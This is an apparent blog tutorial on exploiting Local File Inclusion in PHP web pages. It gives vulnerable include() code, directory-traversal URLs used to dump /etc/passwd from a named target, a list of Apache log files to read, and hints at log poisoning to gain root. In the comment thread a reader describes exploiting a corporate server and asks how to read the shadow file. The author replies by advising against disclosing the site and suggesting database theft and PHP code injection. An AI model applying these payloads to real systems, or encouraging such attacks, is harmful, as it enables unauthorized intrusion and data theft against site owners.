Exploiting Local File Inclusion vulnerability(LFI)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Local File Inclusion mean loading local file such as /etc/passwd , /etc/host on the php web pages. There are many programing mistake for occurring this vulnerability. When Programer put some bad in the php web pages that time this vulnerable occur:

include
include_once
require
require_once
fopen

For example, suppose in a pages :

 
<?
$vulnerable = $_GET[vulnerable];
include
($vulnerable); #this maybe require,require_once, fopen etc
?>

This is code is vulnerable to Local file inclusion vulnerable.

Suppose , Our target url is www.n00bprogammer.com/vulnerable/

If you directly submit this url on browser address bar then you get web page , That’s mean there is a file “index.php”

If we try like :

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

And it output :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false

That’s mean it worked. But modern unix like system now does not include the hash in the /etc/passwd (All hash on /etc/shadow)… So there is no permission then you can’t read /etc/shadow file.

There are many file you may interest to read :

/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_ log 
/usr/local/apache/logs/access. log 
/var/log/apache/access_log 
/var/log/apache2/access_log 
/var/log/apache/access.log 
/var/log/apache2/access.log
 /var/log/access_log
 
 
There are many sites which have unnecessary url variable with file extension... They use the value 
  php,images,asp file. This is not secure at all. For example :

www.target.site/vulnerable.php?=image.jpeg

This maybe also vulnerable to LFI... Try.

Advance hackers can go more deeply. Such as: 

1. There are some special way attacking application tier for rooting the system(Hint: overwriting error_log).
2. Reading more advance file (Hint: SQL).

Try them , Research and learn...
 
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 

Let me know if you have any question please...


4 Replies to “Exploiting Local File Inclusion vulnerability(LFI)”

  1. Got bug today on corporate's server. Its code using PHP download stream "as it is" no matter what the file..LOL. Using LFI, tried to reach /etc/passwd, luckily got all user list in it. But as mentioned above, do you hv any idea or maybey some exploits on how to read shadow file?

  2. You should not mention anywhere that where you got the bug otherwise you may fall into problem(Be ethical LOL). Anyway, You should always looks for other sensitive information like Database,source codes etc or even try to inject some php code using the vulnerability.

    There are many tutorial about that i think.

Leave a Reply

Your email address will not be published. Required fields are marked *